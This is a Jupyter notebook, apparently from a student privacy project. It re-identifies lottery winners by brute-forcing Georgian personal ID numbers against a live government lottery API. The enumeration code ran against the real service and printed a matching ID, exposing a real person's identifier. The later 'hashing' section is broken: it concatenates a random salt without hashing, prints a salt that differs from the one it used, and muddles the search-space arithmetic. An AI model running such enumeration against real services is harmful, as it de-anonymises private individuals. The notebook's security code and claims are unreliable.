In [13]:
# Giorgi Alavidze, Feb 22
# The notebook includes the following:
# (1) "Optimal" brute force search
# (2) Hashing 
# (3) Small essay on why Hashing defeats the brute force search (1)
# (4) K-anonymized dataset 


In [14]:
import requests 
import json 
import pandas as pd
import itertools
import pandasql
import os
import matplotlib
import numpy as np 
import secrets
mil = 1000000

In [15]:
def open_csv():
    '''
    Opens lottoproject.csv, 
    file attached on github.
    '''
    df = pd.read_csv('lottoproject.csv')
    df =  df.drop(df.columns[0],axis=1) #get rid of unwanted columns
    return df

In [16]:
def get_records_resource(pid):
    '''
    get a set of records for 1 day 
    resource - [1,2] -> 1 -- general winners, 2 -- weekly winners
    '''
    base_url = 'https://stopcov-api.lotto.ge/Public/Winnings'
    url = base_url + '/' + pid 
    response = requests.get(url)
    response_json = response.json()
    return response_json

In [17]:
# The following arrangements were taken from https://www.matsne.gov.ge/ka/document/view/59044?publication=0

#special cases
first_five_digits_list = ['01001', '01005', '01008', '01011', '01015', '01017', '01019', '01024', '01027', \
                          '01030', '61001', '61004', '61006', '61008', '66009', '61010', '62001', '62003', '62004', \
                          '62005', '62006', '62007', '62011', '62013']


rest_ = [str(i) + '001' if(i > 9) else str(i) + '0001' for i in range(2,61)] # append the rest of numbers, which has the format: 02001, 03001, etc.

first_five_digits_list += rest_

In [18]:
def obtain_pid():
    '''
    Uses brute force search to identify winners.
    '''
    file_ = open('pid.txt', "w") #open file
    for i in range(999999+1): #one million
        pid = str('50001'+ '{0:06}'.format(i))
        if(get_records_resource(pid)):
            print(pid)
            break
        #print(pid, get_records_resource(pid), '\n')
    file_.close() #close file
    return


In [12]:
obtain_pid()

50001000076


In [24]:
df = open_csv()
pid = df['personalId']
pid = [i for i in pid if i[:3] == '500']
pid

['500-----180',
 '500-----977',
 '500-----467',
 '500-----268',
 '500-----058',
 '500-----156',
 '500-----451',
 '500-----301',
 '500-----008',
 '500-----654',
 '500-----933',
 '500-----302',
 '500-----958',
 '500-----076',
 '500-----528',
 '500-----390',
 '500-----614']

#### In our optimal brute force search, we use the government document which gives us all possible first five element combinations (https://www.matsne.gov.ge/ka/document/view/59044?publication=0) for the personal id number. All the possible arrangements of the first five digits are stored in the first_five_digits_list. In total, there are 11 digits, and there are 82 combinations of the first five digits. That leaves us with 6 digits, and 10^6 (one million) possible combinations. Thus, we will be using the brute force by:
#### Algorithm: for each five digit combination:
####            for i in range of 1 million:
####            create a string s, where s = five digit combination + i (in {0:06} format. e.g. 000001 / 999999)
####            send a get request with string s to see if pid has won or not
####            if true, we found a winner
####            else, we continue the iteration
#### Thus, in total, we will be searching over 82 * 10^6 elements. (82 million)
##### Our other option would be using the original dataset which contains the first and last three digits of the personal id. (Not sure if this is better?)

### (2) Hashing



In [57]:
def encrypt_id(pid):
    salt = secrets.randbits(32)
    hash_pid = pid + str(salt) 
    return hash_pid
    
pid = "01005031154"
print("We will be hashing",encrypt_id(pid), "where", pid, "is the personal id", "and the rest is the salt")

We will be hashing 010050311541670817265 where 01005031154 is the personal id and the rest is the salt 3712349228


### (3) With the salt, an adversary will have to search for 82 * 10^(6+10) elements instead of 82 * 10^(6). 

### (4) For our K-anonymized dataset, K-anonymized dataset (ASK Dr. Truex)